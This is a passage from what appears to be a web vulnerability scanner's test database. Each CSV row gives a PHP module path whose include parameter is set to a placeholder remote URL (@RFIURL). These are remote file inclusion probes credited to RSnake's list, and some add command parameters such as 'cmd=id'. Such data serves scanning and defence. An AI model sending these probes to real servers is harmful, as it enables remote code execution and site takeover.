(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005375\",\"5292\",\"c\",\"/modules/NukeAI/util.php?AIbasedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005376\",\"5292\",\"c\",\"/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005377\",\"5292\",\"c\",\"/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005378\",\"5292\",\"c\",\"/modules/abook/foldertree.php?baseDir==@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005379\",\"5292\",\"c\",\"/modules/addons/plugin.php?doc_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005380\",\"5292\",\"c\",\"/modules/admin/include/config.php?doc_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005381\",\"5292\",\"c\",\"/modules/admin/include/localize.php?doc_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005382\",\"5292\",\"c\",\"/modules/agendax/addevent.inc.php?agendax_path=@RFIURL&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005383\",\"5292\",\"c\",\"/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005384\",\"5292\",\"c\",\"/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005385\",\"5292\",\"c\",\"/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005386\",\"5292\",\"c\",\"/modules/birstday/birst.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005387\",\"5292\",\"c\",\"/modules/birstday/profile_show.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005388\",\"5292\",\"c\",\"/modules/birstday/select.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005389\",\"5292\",\"c\",\"/modules/blocks/headerfile.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005390\",\"5292\",\"c\",\"/modules/calendar/index.php?inc_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005391\",\"5292\",\"c\",\"/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005392\",\"5292\",\"c\",\"/modules/calendar/mod_calendar.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005393\",\"5292\",\"c\",\"/modules/calendar/mod_calendar.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005394\",\"5292\",\"c\",\"/modules/certinfo/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005395\",\"5292\",\"c\",\"/modules/character_roster/include.php?mod_root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005396\",\"5292\",\"c\",\"/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005397\",\"5292\",\"c\",\"/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005398\",\"5292\",\"c\",\"/modules/coppermine/themes/default/theme.php?THEME_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005399\",\"5292\",\"c\",\"/modules/downloads/lib/LM_Downloads.php?pathToIndex=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005400\",\"5292\",\"c\",\"/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005401\",\"5292\",\"c\",\"/modules/emails/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005402\",\"5292\",\"c\",\"/modules/events/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005403\",\"5292\",\"c\",\"/modules/fax/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005404\",\"5292\",\"c\",\"/modules/files/blocks/latest_files.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005405\",\"5292\",\"c\",\"/modules/files/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005406\",\"5292\",\"c\",\"/modules/files/list.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005407\",\"5292\",\"c\",\"/modules/filters/headerfile.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005408\",\"5292\",\"c\",\"/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005409\",\"5292\",\"c\",\"/modules/forums/blocks/latest_posts.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005410\",\"5292\",\"c\",\"/modules/global/inc/content.inc.php?sIncPath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005411\",\"5292\",\"c\",\"/modules/groupadm/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005412\",\"5292\",\"c\",\"/modules/groups/headerfile.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005413\",\"5292\",\"c\",\"/modules/guestbook/index.php?CONFIG[local_root]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005414\",\"5292\",\"c\",\"/modules/history/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005415\",\"5292\",\"c\",\"/modules/home.module.php?repmod=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005416\",\"5292\",\"c\",\"/modules/horoscope/footer.php?xoopsConfig[root_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005417\",\"5292\",\"c\",\"/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005418\",\"5292\",\"c\",\"/modules/info/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005419\",\"5292\",\"c\",\"/modules/links/blocks/links.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005420\",\"5292\",\"c\",\"/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005421\",\"5292\",\"c\",\"/modules/links/submit_links.php?rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005422\",\"5292\",\"c\",\"/modules/log/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005423\",\"5292\",\"c\",\"/modules/mail/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005424\",\"5292\",\"c\",\"/modules/menu/headerfile.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005425\",\"5292\",\"c\",\"/modules/messages/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005426\",\"5292\",\"c\",\"/modules/mod_as_category.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005427\",\"5292\",\"c\",\"/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005428\",\"5292\",\"c\",\"/modules/mod_calendar.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005429\",\"5292\",\"c\",\"/modules/mod_flatmenu.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005430\",\"5292\",\"c\",\"/modules/mod_mainmenu.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005431\",\"5292\",\"c\",\"/modules/mod_weather.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005432\",\"5292\",\"c\",\"/modules/mod_weather.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005433\",\"5292\",\"c\",\"/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005434\",\"5292\",\"c\",\"/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005435\",\"5292\",\"c\",\"/modules/newbb_plus/config.php?bbPath[root_theme]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005436\",\"5292\",\"c\",\"/modules/newbb_plus/votepolls.php?bbPath[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005437\",\"5292\",\"c\",\"/modules/news/blocks/latest_news.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005438\",\"5292\",\"c\",\"/modules/newusergreatings/pm_newreg.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005439\",\"5292\",\"c\",\"/modules/organizations/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005440\",\"5292\",\"c\",\"/modules/phones/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005441\",\"5292\",\"c\",\"/modules/pms/index.php?module_path=@RFIURL???\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005442\",\"5292\",\"c\",\"/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005443\",\"5292\",\"c\",\"/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005444\",\"5292\",\"c\",\"/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005445\",\"5292\",\"c\",\"/modules/presence/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005446\",\"5292\",\"c\",\"/modules/projects/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005447\",\"5292\",\"c\",\"/modules/projects/list.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005448\",\"5292\",\"c\",\"/modules/projects/summary.inc.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005449\",\"5292\",\"c\",\"/modules/punish/p_error.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005450\",\"5292\",\"c\",\"/modules/punish/profile.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005451\",\"5292\",\"c\",\"/modules/reports/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005452\",\"5292\",\"c\",\"/modules/search/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005453\",\"5292\",\"c\",\"/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005454\",\"5292\",\"c\",\"/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005455\",\"5292\",\"c\",\"/modules/settings/headerfile.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005456\",\"5292\",\"c\",\"/modules/snf/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005457\",\"5292\",\"c\",\"/modules/syslog/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005458\",\"5292\",\"c\",\"/modules/tasks/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005459\",\"5292\",\"c\",\"/modules/tasks/searchsimilar.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005460\",\"5292\",\"c\",\"/modules/tasks/summary.inc.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005461\",\"5292\",\"c\",\"/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005462\",\"5292\",\"c\",\"/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005463\",\"5292\",\"c\",\"/modules/tml/block.tag.php?GLOBALS[PTH][classes]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005464\",\"5292\",\"c\",\"/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005465\",\"5292\",\"c\",\"/modules/useradm/index.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005466\",\"5292\",\"c\",\"/modules/users/headerfile.php?system[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005467\",\"5292\",\"c\",\"/modules/vWar_Account/includes/functions_common.php?vwar_root2=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005468\",\"5292\",\"c\",\"/modules/visitors2/include/config.inc.php?lvc_include_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005469\",\"5292\",\"c\",\"/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005470\",\"5292\",\"c\",\"/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005471\",\"5292\",\"c\",\"/modules/xfsection/modify.php?dir_module=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005472\",\"5292\",\"c\",\"/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005473\",\"5292\",\"c\",\"/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005474\",\"5292\",\"c\",\"/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005475\",\"5292\",\"c\",\"/modulistica/mdl_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005476\",\"5292\",\"c\",\"/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005477\",\"5292\",\"c\",\"/moodle/admin/utfdbmigrate.php?cmd=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005478\",\"5292\",\"c\",\"/moosegallery/display.php?type=@RFIURL?&cmd=[command]\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005479\",\"5292\",\"c\",\"/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005480\",\"5292\",\"c\",\"/moteur/moteur.php?chemin=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005481\",\"5292\",\"c\",\"/movie_cls.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005482\",\"5292\",\"c\",\"/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005483\",\"5292\",\"c\",\"/music/buycd.php?HTTP_DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005484\",\"5292\",\"c\",\"/mutant_includes/mutant_functions.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005485\",\"5292\",\"c\",\"/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005486\",\"5292\",\"c\",\"/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005487\",\"5292\",\"c\",\"/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005488\",\"5292\",\"c\",\"/myphpcommander_path/system/lib/package.php?gl_root=@RFIURL?cmd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 